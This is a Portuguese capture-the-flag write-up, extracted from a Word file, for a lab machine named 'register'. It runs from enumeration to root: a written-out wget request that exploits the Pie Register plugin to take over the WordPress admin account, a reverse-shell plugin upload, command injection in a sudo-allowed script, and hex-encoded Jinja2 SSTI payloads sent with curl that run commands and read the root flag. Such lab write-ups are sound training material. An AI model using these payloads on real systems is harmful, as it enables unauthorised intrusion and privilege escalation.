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- Register</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Write-up register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Necessitamos determinar os serviços em execução e identificar as portas acessíveis. Para realizar essa tarefa, empregaremos o Nmap, uma ferramenta especializada em mapeamento de redes e análise de serviços.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="1359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9410fe-d566-4ce9-9e1e-dd6bc6e9d6f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9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 conclusão da execução da ferramenta, identificamos a abertura de apenas uma porta web, a 80.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Como podemos observar, a aplicação não carregou corretamente o CSS. Isso ocorre porque ainda não adicionamos o domínio ao nosso arquivo hosts. Podemos obter o nome do domínio inspecionando a página.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="2621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df2c74-bf34-41ed-a1cf-153d4cc07f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1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249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b0850d-b8a4-424d-aa87-d1bd7b29c5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9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associar o endereço IP ao nome de domínio, observamos que o CSS foi carregado adequadamente, confirmando que o sistema de gerenciamento de conteúdo utilizado é o "WordPress".</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="1925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835bca-18be-4f73-acc9-c3557e62ae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57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t>WPScan é um software de teste de caixa-preta (BlackBox) para escanear possíveis vulnerabilidades em instalações WordPress e seus complementos.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[https://github.com/wpscanteam/wpscan](https://github.com/wpscanteam/wpscan)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="26490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e5f2e0-f1dd-4725-8b69-b3cc4cf6577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9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176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7d440f-422f-4186-8122-58023dcd24b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6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concluir a análise da ferramenta, observei que o CMS está utilizando o plugin "pie-register". No entanto, ao explorar algumas vulnerabilidades identificadas, não obtive sucesso. Realizando uma pesquisa na internet, encontramos outra vulnerabilidade relacionada a este plugin "Admin Privilege Escalation (Unauthenticated)".</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)](https://www.exploit-db.com/exploits/50395)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated).. webapps exploit for PHP platform](https://www.exploit-db.com/exploits/50395)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[![](https://www.exploit-db.com/favicon.ico)](https://www.exploit-db.com/exploits/50395)[https://www.exploit-db.com/exploits/50395](https://www.exploit-db.com/exploits/50395)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572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a9a6c1-1b20-49a9-934f-b6218181f04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Conforme o link acima, podemos enviar essencialmente esta requisição:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>`wget -q -S -O - http://register.hc/ --post-data 'useridsocialsite=1&amp;socialsite=true&amp;pieregloginafterregistration=true&amp;wphttpreferer=/login/&amp;log=null&amp;pwd=null' &gt; /dev/null`</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>para obtermos o cookie do usuário admin, autenticando-nos assim como usuário admin no CMS.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="16596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28e8e4-3b88-469a-9b65-be5af22e15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9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Depois de adquirir o cookie do usuário admin, podemos configurá-lo manualmente em nosso navegador.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="10807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dbc26-587b-479f-a381-ab34c99767f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setarmos o cookie, somos autenticado como administrador no CMS:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="16558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327871-057a-42c6-9476-cb1eca44e83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5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que temos acesso como administrador, podemos criar um plugin malicioso que incluirá a nossa payload de shell reversa:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[WordPress Plugin : Reverse Shell](https://sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[I'm working on project which involves creating a WordPress plugin and it got me to thinking about how easy it would be to create a plugin that's sole purpose is a reverse shell.  To get a shell from a WordPress UI, I've used plugins that allow for inclusion of PHP and I've also edited embedded PHP such as the footer.php file.  But until now, I didn't occur to me to write a plugin to perform the task.  I started tinkering around and I initially used Pentest Monkey's reverse shell and even though it tossed back a shell, it also killed the WordPress site.  I literally had to go into the /wp-content/plugins directory to manually remove the plugin before the site would function correctly again.  Not ideal for a number of reasons.](https://sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[![](https://sevenlayers.com/templates/theme3294/favicon.ico)](https://sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell)[https://sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell](https://sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="1755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7414f4-a58e-4e3d-b790-0b0f19268b8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5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 plugin criado, podemos acessar Plugins-&gt; Add New e fazer o upload do mesmo:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="23025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7218b4-fa8b-4986-b112-d040f292fe1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25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6003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1e67d2-859d-42ba-a95b-bdb44ea5a21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0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clicarmos em "Activate Plugin" recebemos a shell</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="19550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70f6d5-ec6e-4a2f-bbae-be9330d11be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50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3168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fb5fd4-2739-4ef5-aa3e-c1bda9dd9e5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168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drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="1174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f3fdf-e3f6-47e3-9534-a1b6a56db80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shell no servidor, o objetivo é recuperar a flag de usuário. No entanto, ao examinar o diretório home, constatamos a impossibilidade de acessar a home do usuário "bob", onde a flag está armazenada. Consequentemente, é necessário realizar uma escalação lateral para obter acesso a esse usuário. Durante a análise do comando "sudo -l", identificamos que é possível executar "/usr/bin/python2.7 /opt/aulas/ex09.py" com as permissões do usuário "bob", sem a necessidade de fornecer sua senha.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Ao analisar detalhadamente o conteúdo do arquivo "[ex09.py](http://ex09.py)" no diretório "/opt", podemos indentificar uma vulnerabilidade de injeção de comando (Command Injection). Isso ocorre devido à entrada do usuário, que é passada como argumento para o comando "echo" sem qualquer sanitização, e esse comando é executado dentro da função "`system`".</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[![](https://t9007105134.p.clickup-attachments.com/t9007105134/e90d8839-9e18-4cf5-a15b-a53b60591e7f/sudo-l.png)](http://sudo-l.png)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="15488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fdabd3-271a-48d3-89d6-8afb1a950a3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8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executar `$(id)`, conseguimos explorar com sucesso a vulnerabilidade de injeção de comando:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="10195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deaedc-83ef-4f79-be15-d2b6041cff7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9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 passo subsequente consiste em adquirirmos uma shell com o usuário "bob". Para alcançar esse objetivo, iremos inserir uma payload de reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Ouvinte do netcat para receber a coonexão:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="1524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a1af0-9d24-4547-b504-97fb4355585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5252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0671be-5119-41a7-9034-dad08a2eda9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52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5200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04794a-7989-4829-bf5e-5df7e8f6ca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00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home do usuário bob, conseguimos obter a primeira flag</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="12816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a4276d-bdd4-4332-a04d-89c460271dc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16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pegarmos a nossa primeira flag de usuário, é hora de escalarmos privilégios para obtermos a nossa última flag, para isso teremos que escalar para o usuário root.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>No diretório home do usuário "bob", há um projeto Flask pertencente ao usuário "root". Ao analisar o código, identificamos uma vulnerabilidade de Server-Side Template Injection (SSTI), pois o código está utilizando `rendertemplate` e temos controle sobre a variável `username`. No entanto, há uma lista negra que precisamos contornar. Ao executar o comando `ss -nlapt`, observamos que a aplicação está sendo executada localmente na porta 5000.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="27899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455acf-a705-4813-b7f5-8ac1ccf1a64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99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91274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f6b61-387f-4c7c-8bbe-7e7c176fb77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2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base no artigo fornecido, podemos superar essas restrições usando a representação hexadecimal.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[Jinja2 SSTI filter bypasses](https://medium.com/@nyomanpradipta120/jinja2-ssti-filter-bypasses-a8d3eb7b000f)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[as you (should) know — blacklists are bad and can often be circumvented. To check the class in SSTI jinja2 we can use payload…](https://medium.com/@nyomanpradipta120/jinja2-ssti-filter-bypasses-a8d3eb7b000f)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Podemos, então, realizar uma requisição usando o curl, enviando a seguinte payload para obter as subclasses:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>`curl 127.0.0.1:5000/apiregisterv2 --data "username={{()|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fbase\x5f\x5f')|attr('\x5f\x5fsubclasses\x5f\x5f')()}}”`</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Examinando o HTML retornado, observamos a listagem das subclasses:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="12265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aa64ca-f897-41ab-8a36-879d5ee2436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6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inserir as subclasses no Visual Studio Code, conseguimos realizar uma análise mais detalhada e, desse modo, identificar a posição da `subprocess.Popen`.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="1271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7ed66-11b2-47a7-a8de-deb0934a7dd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1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retroceder algumas posições, especificamente à posição 202, conseguimos localizar a ocorrência de `subprocess.Popen`.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>`curl 127.0.0.1:5000/apiregisterv2 --data "username={{()|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fbase\x5f\x5f')|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(202)}}”`</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="169568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9f4287-c724-43a1-b228-f12c630b0cf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6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a posição exata de `subprocess.Popen`, agora temos a capacidade de execução remota de código. Podemos observar que recebemos a saída do comando `id`.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>`curl 127.0.0.1:5000/apiregisterv2 --data "username={{()|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fbase\x5f\x5f')|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(202)('id',shell=True,stdout=-1)|attr('communicate')()|attr('\x5f\x5fgetitem\x5f\x5f')(0)|attr('decode')('utf-8')}}”`</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="1673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49244a-3405-4551-9c5d-a6a2100b4dc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tentar ler a flag de root, encontramos a mensagem "character not allowed" devido ao espaço em nosso comando `cat /root/root.txt`. Para contornar esse problema, podemos utilizar `${IFS}`.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Ao utilizar `${IFS}` em um comando, você está inserindo o separador de campos definido em `IFS`. Isso pode ser útil para contornar problemas com espaços em branco ou outros caracteres especiais que poderiam interferir na interpretação correta dos comandos pelo shell.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Outra abordagem possível é utilizar `\x09` para contornar a restrição, aproveitando a representação hexadecimal do caractere de tabulação.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Agora podemos acessar e ler a última flag que está localizada no diretório `/root`. Alternativamente, se preferir, você pode obter uma reverse shell =)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>`curl 127.0.0.1:5000/apiregisterv2 --data "username={{()|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fbase\x5f\x5f')|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(202)('cat\x09/root/root.txt',shell=True,stdout=-1)|attr('communicate')()|attr('\x5f\x5fgetitem\x5f\x5f')(0)|attr('decode')('utf-8')}}”`</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="162119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4a51b-22f4-418f-8b67-22eb01577ca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1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